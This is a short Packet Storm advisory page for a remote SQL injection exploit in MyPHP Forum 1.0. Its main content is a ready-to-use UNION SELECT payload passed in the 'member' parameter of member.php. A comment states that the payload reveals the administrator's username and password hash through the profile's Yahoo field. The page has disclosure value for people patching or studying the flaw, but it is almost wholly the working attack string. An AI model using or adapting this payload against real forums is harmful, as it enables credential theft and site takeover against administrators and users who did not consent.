MyPHPForum v1.0 remote sql injection exploit. Shows administrators name and password. MyPHP Forum is available here.
6cd1c3d8353e7558ac8dd9f5b96f18be76d6c86edacd05ecc29d53784a443ad6/*==========================================*/
// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: http://www.myphp.ws
// VULNERABILITY CLASS: SQL injection
/*==========================================*/
[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1
/* will show administrator's name and password hash (in the "Yahoo" field). */
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed